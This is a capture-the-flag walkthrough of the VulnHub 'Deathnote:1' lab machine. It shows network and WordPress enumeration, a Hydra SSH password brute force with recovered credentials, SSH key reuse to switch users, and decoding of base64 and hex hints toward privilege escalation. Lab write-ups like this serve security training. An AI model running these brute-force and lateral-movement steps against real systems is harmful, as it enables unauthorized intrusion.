Deathnote:1 || VulnHub Complete Walkthrough

In this article, we are going to tackle a vulnerable machine with a difficulty level Easy. You have to download the OVA image from VulnHub.


Once you have downloaded it, you need to set up the server. It is pretty easy to set up the server within VirtualBox.


Settings Up

Launch VirtualBox and then click on Tools and then click on “Import” and import the OVA file. 

Once you are done with these, click on settings and change the Network Adapter to the Host-only adapter.

Make sure your Kali Linux Machine, from where you perform an attack, and Your Vulnerable machine are in the same network.

Once you are done with setting up, let’s start the Virtual Machines.

As you can notice, our Vulnerable Machine is ready, and we have a login screen that prompts us to input the username and password.


Enumeration

Our first step is to identify the IP Address of our Target Machine using NetDiscover. Open a terminal and run the following command:

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.174.0/16   |   Screen View: Unique Hosts                                                          
                                                                                                                               
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.162.1   0a:00:27:00:00:07      1      60  Unknown vendor                                                              
 192.168.162.2   08:00:27:b2:a3:05      1      60  PCS Systemtechnik GmbH                                                      
  192.168.162.6   08:00:27:cf:c2:1c      1      60  PCS Systemtechnik GmbH      

From the Scan result, we have discovered our target IP address i.e. “192.168.162.6”.


Network Discovery with Nmap

Now, let's perform a network scan to detect what ports are open. Scanning the Network is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool.

  • -sS: Used for TCP SYN Scan. It is a quick, default, and most popular scan, that can scan thousands of ports.
  • -sC: Used to perform a script scan using the default set of scripts, 
  • -sV : Enables version detection, which will detect what versions are running on what port 
  • -p- : Used to select all ports.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -p- 192.168.162.6
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 15:42 EDT
Nmap scan report for 192.168.162.6
Host is up (0.00094s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
|   256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_  256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:CF:C2:1C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$

From the Network scanning, we have spotted two open ports.

  • Port 22/TCP runs an SSH service, which means, that if you have a valid credential then it will be easy to gain login access to the server.
  • Port 80/TCP running an HTTP service, which indicates that there is some vulnerable website being hosted.

Web Enumeration

So, let’s take a look at the web content running on Port 80. To look at the contents ourselves, we can open a Web Browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window. 

Upon attempting to access the webpage through a browser window, we are presented with the following error.

Here, we can’t connect to the server at "deathnote.vuln".

This type of error appears due to two underlying reasons.

  1. If we have mistyped the URL address in our URL search bar so that the DNS servers can't find the associated IP address for the mistyped name
  2. If We never entered any hostname like “deathnote.vuln” into the search bar, but the website expects us to.

Resolving Server Connection Issues by Modifying Hosts File

This type of problem can be fixed by modifying the Local DNS file named “/hosts” located in the /etc directory. Open a terminal and then type the following command to add the IP address with its associated hostname in the host's table, which would allow your web client to visit the website that was previously reporting an error.

┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts
[sudo] password for kali:
127.0.0.1       localhost
127.0.1.1       kali
192.168.162.6   deathnote.vuln


::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Now save it using CTRL + X and hit Enter. You can verify the “/hosts” table using the following command.

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
192.168.162.6   deathnote.vuln


::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

                                                                                                                                
┌──(kali㉿kali)-[~]
└─$

Once this configuration is complete, we can proceed to reload the target's webpage and verify if it loads successfully or not. Since the requested hostname now has an association in your “/hosts” file, the website can load without any issues.

After analyzing the URL at the top of the window, I confirm that the running website might be created using WordPress CMS.

As per our knowledge, WordPress websites can be an easy target as they can easily be left vulnerable. So, we ran the WPScan tool on the target application to identify known vulnerabilities.


WordPress Security Assessment with WPScan

WP Scan is used to check, if the running site is vulnerable to WP version, and check if a theme and plugin is up-to-date, or known to be vulnerable.

To Learn More:

WPScan

WPScan is a black box WordPress vulnerability scanner that can be used to scan WordPress websites for known security vulnerabilities. It is written in Ruby and offers various scanning features such as plugin enumeration, theme enumeration, password brute-forcing, and vulnerability detection. WPScan helps WordPress administrators and security professionals identify and fix security issues to secure their WordPress installations against potential attacks.


┌──(kali㉿kali)-[~]
└─$ wpscan --url http://deathnote.vuln/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://deathnote.vuln/wordpress/ [192.168.162.6]
[+] Started: Wed Sep  7 15:49:36 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://deathnote.vuln/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://deathnote.vuln/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://deathnote.vuln/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Rss Generator (Passive Detection)
 |  - http://deathnote.vuln/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.8</generator>
 |  - http://deathnote.vuln/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:02 <=================================================> (137 / 137) 100.00% Time: 00:00:02

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Sep  7 15:49:49 2022
[+] Requests Done: 186
[+] Cached Requests: 5
[+] Data Sent: 48.786 KB
[+] Data Received: 19.153 MB
[+] Memory used: 240.469 MB
[+] Elapsed time: 00:00:12
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

From the output, we have noticed that the running WordPress site is not vulnerable to its WP version but we got some interesting and useful mistakes that can help us in terms of a foothold on the server.

They are like,

  • Headers, which indicates that the running server is hosted using Apache.
  • XML RPC is enabled, but it is not useful at this moment. 
  • The WordPress readme.txt is enabled, which contains the procedure of installation of WordPress.

The Upload directory has listening enabled, which means, we can directly access the content within the WordPress directory.

Some other services are enabled, you can also have a look at them. So, let’s enumerate the target URL. There might be any hidden or hardly accessible directories and pages, and that can be done through directory Busting.


Discovery of Hidden Directories and files with Gobuster

Using gobuster as our tool of choice, we can use the following switches for the script to get the fastest, most accurate results.

  • dir: Used to specify the mode of enumeration, 
  • -u:  Used to specify the target URL, 
  • -w: Used to specify the path of the wordlist.

┌──(kali㉿kali)-[~]
└─$ gobuster dir --url http://deathnote.vuln/wordpress/ --wordlist /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://deathnote.vuln/wordpress/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/07 15:52:58 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/index.php            (Status: 301) [Size: 0] [--> http://deathnote.vuln/wordpress/]
/wp-admin             (Status: 301) [Size: 329] [--> http://deathnote.vuln/wordpress/wp-admin/]
/wp-content           (Status: 301) [Size: 331] [--> http://deathnote.vuln/wordpress/wp-content/]
/wp-includes          (Status: 301) [Size: 332] [--> http://deathnote.vuln/wordpress/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]                                                    
                                                                                                  
===============================================================
2022/09/07 15:53:03 Finished
===============================================================
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$

As a result of Directory busting, we obtained a WP admin page. As we don’t have a valid username and password, so we can’t get login access.

Since we have performed the directory busting on the WordPress directory, it means there might be some hidden or hardly accessible directories and pages that exist on "deathnote.vuln".

┌──(kali㉿kali)-[~]
└─$ gobuster dir --url http://deathnote.vuln/ --wordlist /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://deathnote.vuln/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/07 15:54:03 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 197]
/manual               (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/robots.txt           (Status: 200) [Size: 68]                                     
/server-status        (Status: 403) [Size: 279]                                    
/wordpress            (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
                                                                                      
===============================================================
2022/09/07 15:54:08 Finished
===============================================================
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

From the result of Directory busting, we obtained the “robots.txt” file. Let’s dig into this file, and find out if there is any sensitive information that might help us in foothold. Let’s have a look.

From “robots.txt”, we discover another hint. That hint seems to be like an image file that has been mistakenly added to the target application. So, let us open the file ‘important.jpg’ on the browser.

As a result, there seems to be like contain some error while I try to open the file. So, I decided to download the image file on our Kali machine for further analysis. So open a new terminal and then type the following command:

┌──(kali㉿kali)-[~]
└─$ wget http://192.168.162.6/important.jpg 
--2022-09-07 15:58:10--  http://192.168.162.6/important.jpg
Connecting to 192.168.162.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 277 [image/jpeg]
Saving to: ‘important.jpg’

important.jpg                   100%[=======================================================>]     277  --.-KB/s    in 0s      

2022-09-07 15:58:10 (23.7 MB/s) - ‘important.jpg’ saved [277/277]

                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

You can find out the downloaded file in the Kali directory. 

Let me open this image file from here. As a result, you can notice that the same error occurs.


Analyzing File Types with the 'file' Command

There might be some problems with this file. Let me run this file command to determine the type of file. 

┌──(kali㉿kali)-[~]
└─$ file important.jpg
important.jpg: ASCII text
┌──(kali㉿kali)-[~]
└─$

From the output, we discovered that the file is in the form of ASCII text, which means, it is a text file. So rename the file to text, and then try to open it.

The hint message indicates a piece of information that could help us log into the target application. Previously, we have seen the “user.txt” file, exist within the upload directory.

Let us open the “user.txt” file in a new tab. 

As you can see, few users are listed in this wordlist. What if we had a wordlist for passwords, we could perform a brute force attack to obtain access to the network.


Foothold

While exploring the upload contents, I have identified that the “notes.txt” file might be a wordlist that may contain some passwords list. 

Now, we have wordlists for usernames and passwords. So, let’s perform a Brute force attack to get a valid username with its respective password.

Before that, we have to download these files using the wget command line utility tool. 

┌──(kali㉿kali)-[~]
└─$ wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
--2022-09-07 16:01:40--  http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
Resolving deathnote.vuln (deathnote.vuln)... 192.168.162.6
Connecting to deathnote.vuln (deathnote.vuln)|192.168.162.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 449 [text/plain]
Saving to: ‘notes.txt’

notes.txt                       100%[=======================================================>]     449  --.-KB/s    in 0s      

2022-09-07 16:01:40 (35.0 MB/s) - ‘notes.txt’ saved [449/449]

                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt 
--2022-09-07 16:02:33--  http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
Resolving deathnote.vuln (deathnote.vuln)... 192.168.162.6
Connecting to deathnote.vuln (deathnote.vuln)|192.168.162.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [text/plain]
Saving to: ‘user.txt’

user.txt                        100%[=======================================================>]      91  --.-KB/s    in 0s      

2022-09-07 16:02:33 (8.03 MB/s) - ‘user.txt’ saved [91/91]

                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ ls
Desktop  Documents  Downloads  important.txt  Music  notes.txt   Pictures  Public  Templates  user.txt   Videos


Hydra-Enabled SSH Bruteforce Attack and Access Acquisition

The Mostly used tool is “Hydra”, which allows us to perform various kinds of brute force attacks using wordlists.

  • -L: Used to load several logins from the specified wordlist. 
  • -P: Used to load several passwords from the specified wordlist.
┌──(kali㉿kali)-[~]
└─$ hydra -L user.txt -P notes.txt ssh://192.168.162.6
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-07 16:05:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43), ~46 tries per task
[DATA] attacking ssh://192.168.162.6:22/
[STATUS] 271.00 tries/min, 271 tries in 00:01h, 463 to do in 00:02h, 13 active
[22][ssh] host: 192.168.162.6   login: l   password: death4me
[STATUS] 277.50 tries/min, 555 tries in 00:02h, 179 to do in 00:01h, 13 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-07 16:08:08
                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ 

From above, we have discovered a username and it’s the password that is marked in bold.

[22][ssh] host: 192.168.162.6   login: l    password: death4me

Now, we have a valid username and it’s the password to log into the server via SSH client tool. So, we can try to log into the server.  

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]      
The authenticity of host '192.168.162.6 (192.168.162.6)' can't be established.
ED25519 key fingerprint is SHA256:Pj7G++7sat/zpoeFTsy5FUba1luVvaIo7NG0PdXzxY8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.162.6' (ED25519) to the list of known hosts.
[email protected]'s password: death4me
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:12:29 2021 from 192.168.1.6
l@deathnote:~$ 

The login was successful. Run the following commands to obtain the user flag.

l@deathnote:~$ ls                                                                                                                
user.txt                                                                                                                         
l@deathnote:~$ cat user.txt                                                                                                     
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------. 
l@deathnote:~$ 


The decryption of Encrypted Brainfuck Cipher Text

The content of the user flag seems to be like a hint, which is encoded with the help of the Brain fuck decoder Algorithm. To decode the text, we can get help from online decoders

As you notice, a message appears after decrypting it.


Privilege Escalation

Let me run the “id” command to find out the user and group names, and numeric IDs like UID, or group ID of the current user or any other user on the server.

l@deathnote:~$ id
uid=1000(l) gid=1000(l) groups=1000(l),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)   
l@deathnote:~$

Since user l does not have sudo user privilege, so, we are going to identify further information about the target machine, which could be useful for gaining root access.

Let's identify the rights, and privileges of the current user by executing the sudo -l command. 

l@deathnote:~$ sudo -l
[sudo] password for l: 
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$

The output displays that, the running user does not have the right to run the sudo command, which means, there might be another user, which consists of permission to run sudo commands.


SUID Binary Privilege Escalation via SSH Access and CyberChef Decode

To get to know, what is the name of the user, which consists of sudo permissions. You can find them, in the home directory. Run the ls command to list the directories within the /home directory. 

l@deathnote:~$ cd /home
l@deathnote:/home$ ls -al
total 16
drwxr-xr-x  4 root root 4096 Jul 19  2021 .
drwxr-xr-x 18 root root 4096 Jul 19  2021 ..
drwxr-xr-x  4 kira kira 4096 Sep  4  2021 kira
drwxr-xr-x  4 l    l    4096 Sep  4  2021 l
l@deathnote:/home$

There are two directories, one is Kira and another one is l . It means the user Kira might consist of the root permission.

We don't have access to the user Kira, but we can still check the files inside it.

l@deathnote:/home/kira$ ls -al                                                                                                  
total 32
drwxr-xr-x 4 kira kira 4096 Sep  4  2021 .
drwxr-xr-x 4 root root 4096 Jul 19  2021 ..
-rw------- 1 kira kira    0 Sep  4  2021 .bash_history
-rw-r--r-- 1 kira kira  220 Jul 19  2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19  2021 .bashrc
-rwx------ 1 kira root   85 Aug 29  2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19  2021 .local
-rw-r--r-- 1 kira kira  807 Jul 19  2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19  2021 .ssh
kira@deathnote:~$

There are no special files, except the “kira.txt” file. Let me have a look at it.

l@deathnote:/home/kira$ cat kira.txt  
cat: kira.txt: Permission denied
l@deathnote:/home/kira$

This shows an error because we don’t have the right to open it. It means we have to switch the user to Kira, but we don’t have the password.

We can easily, switch to the user Kira with the help of SSH. As you can notice there is a directory named “.ssh” which contains access credentials for SSH protocol.

l@deathnote:/home/kira$ cd .ssh/
l@deathnote:/home/kira/.ssh$ ls -al                                                                                             
total 12                                                                                                                        
drwxr-xr-x 2 kira kira 4096 Jul 19  2021 .                                                                                      
drwxr-xr-x 4 kira kira 4096 Sep  4  2021 ..                                                                                     
-rw-r--r-- 1 kira kira  393 Jul 19  2021 authorized_keys                                                                        
l@deathnote:/home/kira/.ssh$

The ".ssh" directory contains an "authorized_keys" file, which means the file contains public keys for public key authentication. Let me have a look at it. 

l@deathnote:/home/kira/.ssh$ cat authorized_keys                                                                                
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote                                                                                                                        
l@deathnote:/home/kira/.ssh$

As you can see, the user l has permission to access through the SSH client Tool. Before that, we have to add this authorized key to the .ssh directory that exists within the user l directory.

l@deathnote:/home/kira/.ssh$ cd /home/l
l@deathnote:~$ ls -al                                                                                                 
total 36                                                                                                                        
drwxr-xr-x 4 l    l    4096 Sep  4  2021 .                                                                                      
drwxr-xr-x 4 root root 4096 Jul 19  2021 ..                                                                                     
-rw------- 1 l    l       0 Sep  4  2021 .bash_history                                                                          
-rw-r--r-- 1 l    l     220 Jul 19  2021 .bash_logout                                                                           
-rw-r--r-- 1 l    l    3526 Jul 19  2021 .bashrc                                                                                                                                                              
drwxr-xr-x 3 l    l    4096 Jul 19  2021 .local                                                                                 
-rw-r--r-- 1 l    l     807 Jul 19  2021 .profile                                                                               
drwxr-xr-x 2 l    l    4096 Jul 19  2021 .ssh 
-rw-r--r-- 1 root root  807 Jul 19  2021 user.txt                                                                                   
l@deathnote:~$ 

Create a new file for Authorized keys with the help of the vi text editor:

l@deathnote:~/.ssh$ ls -al
total 24
drwx------ 2 l l 4096 Sep  8 07:23 .
drwxr-xr-x 4 l l 4096 Sep  4  2021 ..
-rw------- 1 l l 1823 Jul 19  2021 id_rsa
-rw-r--r-- 1 l l  393 Jul 19  2021 id_rsa.pub
-rw-r--r-- 1 l l  444 Sep  8 07:25 known_hosts
l@deathnote:~/.ssh$ vi authorized_keys

We can verify it using the cat command. 

l@deathnote:~/.ssh$  cat authorized_key
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZN
h4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAG
HaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V
0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75m
i6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQI
CFZ6z l@deathnote
l@deathnote:~/.ssh$

As this file does not have executable permission, so we have to set permission using the following command.

l@deathnote:~/.ssh$ ls -al
total 24
drwx------ 2 l l 4096 Sep  8 07:23 .
drwxr-xr-x 4 l l 4096 Sep  4  2021 ..
-rw-r--r-- 1 l l  393 Sep  8 07:23 authorized_keys
-rw------- 1 l l 1823 Jul 19  2021 id_rsa
-rw-r--r-- 1 l l  393 Jul 19  2021 id_rsa.pub
-rw-r--r-- 1 l l  444 Sep  8 07:25 known_hosts
l@deathnote:~/.ssh$ chmod +x authorized_keys 
l@deathnote:~/.ssh$

Now run the SSH client tool to switch the user to Kira. 

l@deathnote:~/.ssh$ ssh [email protected]
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:00:09 2021 from 127.0.0.1
kira@deathnote:~$

We have successfully switched the user to Kira, and we have the right to read the content within the “kira.txt” file.

kira@deathnote:~$ ls -al
total 32
drwxr-xr-x 4 kira kira 4096 Sep  4  2021 .
drwxr-xr-x 4 root root 4096 Jul 19  2021 ..
-rw------- 1 kira kira    0 Sep  4  2021 .bash_history
-rw-r--r-- 1 kira kira  220 Jul 19  2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19  2021 .bashrc
-rwx------ 1 kira root   85 Aug 29  2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19  2021 .local
-rw-r--r-- 1 kira kira  807 Jul 19  2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19  2021 .ssh
kira@deathnote:~$ cat kira.txt  
cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp                                            
kira@deathnote:~$

This file contains some binary text, which seems to be encoded using the base64 algorithm. Let me decode it.

kira@deathnote:~$ echo "cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp" | base64 -d
please protect one of the following                                                                                             
1. L (/opt)                                                                                                                     
2. Misa (/var)
kira@deathnote:~$

From the output, we have discovered that there is an “/opt” directory that might contain something special. Let me change the directory and also list the files and directory.

kira@deathnote:~$ cd /opt/                                                                                        
kira@deathnote:/opt$ ls -al                                                                                                     
total 12                                                                                                                        
drwxr-xr-x  3 root root 4096 Aug 29  2021 .                                                                                     
drwxr-xr-x 18 root root 4096 Jul 19  2021 ..                                                                                    
drwxr-xr-x  4 root root 4096 Aug 29  2021 L                                                                                     
kira@deathnote:/opt$

Here is another directory. Let me change to this directory. 

kira@deathnote:/opt$ cd L                                                                                                       
kira@deathnote:/opt/L$ ls -al                                                                                                   
total 16                                                                                                                        
drwxr-xr-x 4 root root 4096 Aug 29  2021 .                                                                                      
drwxr-xr-x 3 root root 4096 Aug 29  2021 ..
drwxr-xr-x 2 root root 4096 Aug 29  2021 fake-notebook-rule
drwxr-xr-x 2 root root 4096 Aug 29  2021 kira-case
kira@deathnote:/opt/L$

Directory L contains two more directories. Let’s have a look at the "fake-notebook-rule" directory.

kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Aug 29  2021 .
drwxr-xr-x 4 root root 4096 Aug 29  2021 ..
-rw-r--r-- 1 root root   84 Aug 29  2021 case.wav
-rw-r--r-- 1 root root   15 Aug 29  2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$

The "fake notebook rule" contains two important files. Among them, one is a music file ( case.wav ) and another one is a  hint , which is in the form of text. Let me have a look, what are the hints.

kira@deathnote:/opt/L/fake-notebook-rule$ cat hint 
use cyberchef

kira@deathnote:/opt/L/fake-notebook-rule$

The hint emphasizes us to use the cyberchef tool, which means there might be an encoded text that exists here.

CyberChef - Cyber Swiss Army Knife

CyberChef is an open-source web application designed to handle various cybersecurity tasks, serving as a "Swiss Army Knife" for cyber analysts and security professionals. It provides a wide range of operations, including encoding, decoding, encryption, decryption, compression, decompression, and data analysis. CyberChef offers a visual interface where users can chain together different operations to manipulate data and analyze it efficiently. It is particularly useful for tasks such as data transformation, reverse engineering, and cryptanalysis.


Let me run the file command line Utility tool to determine the type of file:

kira@deathnote:/opt/L/fake-notebook-rule$ file case.wav 
case.wav: ASCII text
kira@deathnote:/opt/L/fake-notebook-rule$

The “case.wav” is not an audio file, it is a text file. Let me open it using the cat command.

kira@deathnote:/opt/L/fake-notebook-rule$ cat case.wav 
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
kira@deathnote:/opt/L/fake-notebook-rule$

The “case.wav” contains hexadecimal digits which can be decoded using the cyberchef

The output seems to be, "in the form of base64". Let me decode it. 

Once you decoded it, you noticed the password for the user Kira.

Run the sudo -l command to list the allowed, and forbidden commands for the invoking user on the current host.

kira@deathnote:/opt/L/fake-notebook-rule$ sudo -l                                                                               
